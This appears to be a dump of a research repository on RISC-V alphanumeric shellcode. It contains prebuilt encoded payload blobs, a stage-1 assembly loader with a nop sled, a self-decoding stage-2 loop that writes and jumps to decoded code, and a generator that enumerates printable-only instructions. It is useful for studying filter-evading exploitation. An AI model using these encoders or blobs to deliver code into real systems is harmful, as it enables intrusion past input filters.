BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCGEDEDDDOEEDEEDDGEEEECEDGEEDEDLAKJDDDBDDEDDNCMCDDDDDGMCLCFFDCOBGEDDEGDCHCDDDALCDLMFHGDCHCDDDACOKEDAPFLDLDDDDDDDDLPABHBHBKBHFDFCCKBFCHBbPEFNDDDDDBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB3Z0A3QCAyayayayayayayayayayayayayayayayayayayayaEcY3e##0axAj#1Ay75v71J3SEAi##2ax7Eo91J3SEAY##3ax75#zMJ3SEAM#y#y##4axQcY3E##5ax7ER81J3SEAY##6ax7Ej81J3SEAY##7ax75PP9J3ZEA#8Ay7#z81I3Z#A#9AyAa75r05J3ZEA#2Ay7EBA9J3ZEA#3Ay7#F#1Im93S#Au3#4ax7Ea85J3SEAY3#5ax7Up01J3ZEA#6Ay759M5J3SEAi##7axAcy3e3#8axEcY3e##9axAaAj#2Ay7#h91I3Z#A#3AyySySySySs0A4


--------------------------------------------------------------------------------
/baremetal/hash/stage1.S:
--------------------------------------------------------------------------------
 1 | /*#
 2 |  *# (c) 2018-2019 Hadrien Barral
 3 |  *# SPDX-License-Identifier: Apache-2.0
 4 |  */
 5 | 
 6 | include(`../scripts/common.m4')#'
 7 | 
 8 | #define XP sp
 9 | .macro dangerous_nop2
10 |     li     t1,-2
11 | .endm
12 | 
13 | #ifndef COMPUTE_XP_FIXUP
14 | /*# Defines 'xp_fixup' and 'end_nopsled' */
15 | #include "xp_fixup.S"
16 | #endif
17 | 
18 | .global _start
19 | _start:
20 | step0:
21 |     .word 0x2330236F /*# This is the minimal 'jal reg, step1' */
22 | 
23 | payload_pool:
24 |     repeat(5435, {.half 0x4242})
25 | 
26 | step1: /*# Move 'link' register to XP */
27 |     sra      s4, zero, s3 /*# s4 := 0 */
28 |     sra      XP, t1, s4   /*# XP := t1 */
29 | 
30 | step3: /*# Fixup XP (Need to have 'XP == step6') */
31 |     #ifndef COMPUTE_XP_FIXUP
32 |     xp_fixup
33 |     #endif
34 | 
35 | step4: /*# Write stage2 */
36 | .macro next_block
37 |     /*# 'addi XP,XP,16', but gas chooses another non-alnum encoding */
38 |     .short 0x6141
39 | .endm
40 | #include "stage2_encoded.S"
41 | 
42 | step5: /*# Nopsled to make up for loose ends. */
43 | /*# TODO: could be removed */
44 |     #ifndef COMPUTE_XP_FIXUP
45 |     end_nopsled
46 |     #endif
47 | 
48 | step6: /*# Stage 2 will be decoded here */
49 |     csrc  mip,sp
50 | .global end
51 | end:
52 | 


--------------------------------------------------------------------------------
/baremetal/hash/stage1.ld:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * (c) 2018-2019 Hadrien Barral
 3 |  * SPDX-License-Identifier: Apache-2.0
 4 |  */
 5 | 
 6 | ENTRY (_start)
 7 | 
 8 | SECTIONS
 9 | {
10 |     . = 0x80000000;
11 |     .text . : SUBALIGN(4096) { *(.text) }
12 |     .data : { *(.data) }
13 | }
14 | 


--------------------------------------------------------------------------------
/baremetal/hash/stage2.S:
--------------------------------------------------------------------------------
 1 | /*#
 2 |  *# (c) 2018-2019 Hadrien Barral
 3 |  *# SPDX-License-Identifier: Apache-2.0
 4 |  */
 5 | 
 6 | /*# Allowed registers: s0;a0-a5 (also s1 in specific cases)
 7 |  *# (exception: XS can take any value)
 8 |  */
 9 | #define XA s0
10 | #define XB a5
11 | #define XP a0
12 | #define XQ a4
13 | #define XS t6
14 | #define XJ a3
15 | 
16 |     fence.i
17 |     lui  XQ, 0xfffff    /*# Negative offset to get back somewhere in pool */
18 |                         /*#  'insert' needs to sync with this */
19 |     add  XQ, XQ, sp     /*# Start addr to store to */
20 |     addi XS, XQ, 0x400  /*# Upper store limit */
21 |     mv   XP, XQ         /*# Start addr to load from */
22 |     mv   XJ, XQ         /*# Where to jump */
23 | /*# Decoding loop. See paper for explanation */
24 | next:
25 |     lw   XA, 4(XP)
26 |     mv   XB, XA
27 |     srli XB, XB, 4
28 |     addi XP, XP, 2
29 |     xor  XA, XA, XB
30 |     sw   XA, 0(XQ)
31 |     addi XQ, XQ, 1
32 |     bltu  XQ, XS, next
33 | done:
34 |     fence.i
35 |     jalr XJ
36 | 


--------------------------------------------------------------------------------
/baremetal/lists/.gitignore:
--------------------------------------------------------------------------------
1 | build
2 | *.txt
3 | 


--------------------------------------------------------------------------------
/baremetal/lists/Makefile:
--------------------------------------------------------------------------------
 1 | #
 2 | # (c) 2018-2019 Hadrien Barral
 3 | # SPDX-License-Identifier: Apache-2.0
 4 | #
 5 | 
 6 | MAKEFLAGS += --no-builtin-rules
 7 | SHELL    := /bin/bash -o pipefail
 8 | PREFIX   := riscv64-unknown-elf-
 9 | OBJDUMP  := $(PREFIX)objdump
10 | BUILD    := build
11 | Q        :=
12 | 
13 | 
14 | FLAVOURS := base hash tick slash
15 | ILEN     := 2 4
16 | ISA := 32 64
17 | 
18 | all: $(FLAVOURS)
19 | 
20 | $(BUILD):
21 | 	$(Q)mkdir -p $@
22 | 
23 | # $1:flavour $2:isa $3:ilen
24 | define template3 =
25 | $(BUILD)/$(1)_$(2)_$(3).diss: $(BUILD)/$(1)_$(3).raw
26 | 	$(Q)$(OBJDUMP) -D -b binary -m riscv:rv$(2) $$< > $$@
27 | 
28 | $(BUILD)/$(1)_$(2)_$(3).txt: $(BUILD)/$(1)_$(2)_$(3).diss
29 | 	$(Q)tail --lines=+8 $$< | awk '{print substr($$$$0, index($$$$0, $$$$3))}' | grep -v "^0x" > $$@.tmp1
30 | 	$(Q)sort -n $$@.tmp1 > $$@.tmp2
31 | 	$(Q)rm $$@.tmp1
32 | 	$(Q)mv $$@.tmp2 $$@
33 | endef
34 | 
35 | # $1:flavour $2:isa
36 | define template2 =
37 | $(1): $(1)_$(2).txt
38 | $(foreach ilen,$(ILEN),$(eval $(call template3,$(1),$(2),$(ilen))))
39 | 
40 | $(BUILD)/$(1)_$(2).txt: $(BUILD)/$(1)_$(2)_2.txt $(BUILD)/$(1)_$(2)_4.txt
41 | 	$(Q)cp $(BUILD)/$(1)_$(2)_2.txt $$@.tmp
42 | 	$(Q)echo "================" >> $$@.tmp
43 | 	$(Q)cat $(BUILD)/$(1)_$(2)_4.txt >> $$@.tmp
44 | 	$(Q)mv $$@.tmp $$@
45 | 
46 | $(1)_$(2).txt: $(BUILD)/$(1)_$(2).txt
47 | 	$(Q)cp $$< $$@
48 | endef
49 | 
50 | # $1:flavour $2:ilen
51 | define template_geninst =
52 | $(BUILD)/$(1)_$(2).raw: geninst.php | $(BUILD)
53 | 	$(Q)php $$< $(1) $(2) $$@.tmp
54 | 	$(Q)mv $$@.tmp $$@
55 | endef
56 | 
57 | # $1:flavour
58 | define template1 =
59 | .PHONY: $(1)
60 | $(foreach isa,$(ISA),$(eval $(call template2,$(1),$(isa))))
61 | $(foreach ilen,$(ILEN),$(eval $(call template_geninst,$(1),$(ilen))))
62 | endef
63 | 
64 | $(foreach flavour,$(FLAVOURS),$(eval $(call template1,$(flavour))))
65 | 
66 | clean:
67 | 	$(Q)rm -rf build *.txt


--------------------------------------------------------------------------------
/baremetal/lists/geninst.php:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/php
 2 | <?php
 3 | /*
 4 |  * (c) 2018-2019 Hadrien Barral
 5 |  * SPDX-License-Identifier: Apache-2.0
 6 |  */
 7 | 
 8 | function acceptable_base($s)
 9 | {
10 | 	return ctype_alnum($s); /* No store */
11 | }
12 | 
13 | function acceptable_hash($s)
14 | {
15 | 	return(ctype_alnum($s) || ($s === '#'));
16 | }
17 | 
18 | function acceptable_tick($s)
19 | {
20 | 	return(ctype_alnum($s) || ($s === '\''));
21 | }
22 | 
23 | function acceptable_slash($s)
24 | {
25 | 	return(ctype_alnum($s) || ($s === '/'));
26 | }
27 | 
28 | function instr4($fn, $acceptable)
29 | {
30 | 	$f = fopen($fn, 'wb');
31 | 
32 | 	for($aa = 0; $aa<256; $aa++) {
33 | 		if(($aa & 0b11) != 0b11) { continue; }
34 | 		if(($aa & 0b11100) == 0b11100) { continue; }
35 | 		$a = chr($aa);
36 | 		if(!$acceptable($a)) { continue; }
37 | 		printf("%s", $a);
38 | 	for($bb = 0; $bb<256; $bb++) {
39 | 		$b = chr($bb);
40 | 		if(!$acceptable($b)) { continue; }
41 | 	for($cc = 0; $cc<256; $cc++) {
42 | 		$c = chr($cc);
43 | 		if(!$acceptable($c)) { continue; }
44 | 	for($dd = 0; $dd<256; $dd++) {
45 | 		$d = chr($dd);
46 | 		if(!$acceptable($d)) { continue; }
47 | 
48 | 		$s = $a.$b.$c.$d;
49 | 		fwrite($f, $s);
50 | 	}}}}
51 | 
52 | 	print("\n");
53 | 	fclose($f);
54 | }
55 | 
56 | function instr2($fn, $acceptable)
57 | {
58 | 	$f = fopen($fn, 'wb');
59 | 
60 | 	for($aa = 0; $aa<256; $aa++) {
61 | 		$a = chr($aa);
62 | 		if(!$acceptable($a)) { continue; }
63 | 		printf("%s", $a);
64 | 	for($bb = 0; $bb<256; $bb++) {
65 | 		$b = chr($bb);
66 | 		if(($bb & 0b11) === 0b11) { continue; }
67 | 		if(!$acceptable($b)) { continue; }
68 | 
69 | 		$s = $b.$a;
70 | 		fwrite($f, $s);
71 | 	}}
72 | 
73 | 	printf("\n");
74 | 	fclose($f);
75 | }
76 | 
77 | function instr($name, $ilen, $outfile) {
78 | 	$acceptable = "acceptable_".$name;
79 | 	if($ilen == 2) {
80 | 		instr2($outfile, $acceptable);
81 | 	} else if($ilen == 4) {
82 | 		instr4($outfile, $acceptable);
83 | 	} else {
84 | 		die("Invalid ilen.\n");
85 | 	}
86 | }
87 | 
88 | printf("Generating instructions for flavor:'%s' ilen:'%s' to file '%s'\n", $argv[1], $argv[2], $argv[3]);
89 | instr($argv[1], $argv[2], $argv[3]);
90 | 
91 | ?>
92 | 


--------------------------------------------------------------------------------
/baremetal/payload:
--------------------------------------------------------------------------------
1 | ../payload/


--------------------------------------------------------------------------------
/baremetal/prebuilt/hash.bin:
--------------------------------------------------------------------------------
1 | o#0#BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB